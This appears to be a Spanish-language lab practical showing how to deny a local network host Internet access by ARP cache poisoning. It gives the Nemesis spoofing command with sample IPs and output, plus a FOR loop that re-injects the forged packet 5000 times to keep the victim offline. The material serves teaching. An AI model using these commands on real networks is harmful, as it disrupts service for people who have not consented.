Practica 01 Nemesis inyección de paquetes

3

Click here to load reader

description

El equipo víctima accede a Internet a través del router. Y a su vez, accede al router pq conoce sudirección IP, q es traducida a dirección MAC a través del protocolo ARP

Transcript of Practica 01 Nemesis inyección de paquetes

Page 1: Practica 01 Nemesis inyección de paquetes

Practica 1 - Negación de servicios de Internet a otro equipo de la red local

Teoría:

El equipo víctima accede a Internet a través del router. Y a su vez, accede al router pq conoce sudirección IP, q es traducida a dirección MAC a través del protocolo ARP. Por tanto, en últimainstancia, el equipo víctima accede a Internet mandando paquetes hacia la dirección MAC delrouter. Si el equipo atacante logra engañar al equipo víctima, haciendole creer q la dirección MACdel router es otra inexistente, el equipo víctima no podrá llegar al router, esto es, no podrá llegar aInternet. Para llevar esto a cabo, el equipo atacante debe enviar un paquete malicioso suplantando laidentidad del router y diciéndole al equipo víctima q debe actualizar su tabla ARP con la nuevadirección MAC inexistente.

Aplicación práctica:

Envenenamiento ARP

Escenario:

Atacante: 10.10.0.69Víctima: 10.10.0.254Router / Puerta de Enlace: 10.10.0.33

Herramientas:

Vamos a utilizar el inyector de paquetes Némesis @ http://www.packetfactory.net/projects/nemesis/Más información sobre Nemesis en http://foro.elhacker.net/index.php/topic,33197.0.html

Procedimiento:

1º Obtener las direcciones MACs de los equipos víctima y router a través de sus direcciones IP. Paraello, hacemos un ping a ambos equipos.

2º Obtener la tabla caché ARP de direcciones IP/MAC en el equipo atacante. Esto se hace a travésdel comando arp -a

CitarC:\>arp -a

Interfaz: 10.10.0.69 --- 0x2 Dirección IP Dirección física Tipo 10.10.0.33 00-c0-49-44-b1-d5 dinámico 10.10.0.254 00-20-18-b0-06-df dinámico

C:\>

3º Obtener la tabla caché ARP de direcciones IP/MAC en el equipo víctima. Esto es lo q

Page 2: Practica 01 Nemesis inyección de paquetes

supuestamente ocurriría en el equipo víctima...

CitarC:\WINDOWS\system32>arp -a

Interfaz: 10.10.0.254 --- 0x2 Dirección IP Dirección física Tipo 10.10.0.33 00-c0-49-44-b1-d5 dinámico 10.10.0.69 00-05-1c-0a-ab-92 dinámico C:\WINDOWS\system32>

4º Verificar que la víctima tiene conexión a Internet. Esto es lo q supuestamente ocurriría en elequipo víctima...

CitarC:\WINDOWS\system32>ping www.google.es -t

Haciendo ping a www.google.akadns.net [66.102.11.99] con 32 bytes de datos:

Respuesta desde 66.102.11.99: bytes=32 tiempo=93ms TTL=241Respuesta desde 66.102.11.99: bytes=32 tiempo=113ms TTL=237Respuesta desde 66.102.11.99: bytes=32 tiempo=110ms TTL=237etc.

5º Inyectar desde el atacante el paquete malicioso que envenena la tabla caché ARP de la víctimacon la MAC errónea del router.

Sintaxis de la inyección: nemesis arp -D IPvictima -S IProuter -H MACrouter

CitarC:\>nemesis arp -D 10.10.0.254 -S 10.10.0.33 -H AA:BB:CC:DD:EE:FF

ARP Packet Injected

C:\>

6º Obtener la tabla caché ARP de direcciones IP/MAC envenenada en el equipo víctima. Esto es loq supuestamente ocurriría en el equipo víctima...

CitarC:\WINDOWS\system32>arp -a

Interfaz: 10.10.0.254 --- 0x2 Dirección IP Dirección física Tipo 10.10.0.33 aa-bb-cc-dd-ee-ff dinámico 10.10.0.69 00-05-1c-0a-ab-92 dinámico C:\WINDOWS\system32>

7º Verificar que la víctima NO tiene conexión a Internet. Esto es lo q supuestamente ocurriría en elequipo víctima...

Page 3: Practica 01 Nemesis inyección de paquetes

CitarC:\WINDOWS\system32>ping www.google.es -t

Haciendo ping a www.google.akadns.net [66.102.11.99] con 32 bytes de datos:

Tiempo de espera agotado para esta solicitud.Tiempo de espera agotado para esta solicitud.Tiempo de espera agotado para esta solicitud.Tiempo de espera agotado para esta solicitud.Tiempo de espera agotado para esta solicitud.Tiempo de espera agotado para esta solicitud.Tiempo de espera agotado para esta solicitud.Respuesta desde 66.102.11.99: bytes=32 tiempo=112ms TTL=238etc.

Como podéis observar, después de cierto tiempo, el sistema Windows de la víctima refrescará sutabla caché ARP con la verdadera dirección MAC del router y, entonces, sí que dispondrá deconexión Internet. Se fastidió el invento?? Noooo... si estamos continua y periódicamenteenvenenando la tabla caché ARP de la víctima desde el equipo atacante. Para ello, inyectamos el paquete con Nemesis desde un bucle FOR:

CitarC:\>FOR /L %i IN (1,1,5000) DO nemesis arp -D 10.10.0.254 -S 10.10.0.33 -HAA:BB:CC:DD:EE:FF

C:\>nemesis arp -D 10.10.0.254 -S 10.10.0.33 -H AA:BB:CC:DD:EE:FF

ARP Packet Injected

C:\>nemesis arp -D 10.10.0.254 -S 10.10.0.33 -H AA:BB:CC:DD:EE:FF

ARP Packet Injected

C:\>nemesis arp -D 10.10.0.254 -S 10.10.0.33 -H AA:BB:CC:DD:EE:FF

ARP Packet Injected

C:\>nemesis arp -D 10.10.0.254 -S 10.10.0.33 -H AA:BB:CC:DD:EE:FF

ARP Packet Injected

C:\>nemesis arp -D 10.10.0.254 -S 10.10.0.33 -H AA:BB:CC:DD:EE:FF

ARP Packet Injected

etc.

De esta forma, la víctima no dispondrá de conexión a Internet mientras dure el bucle FOR delatacante...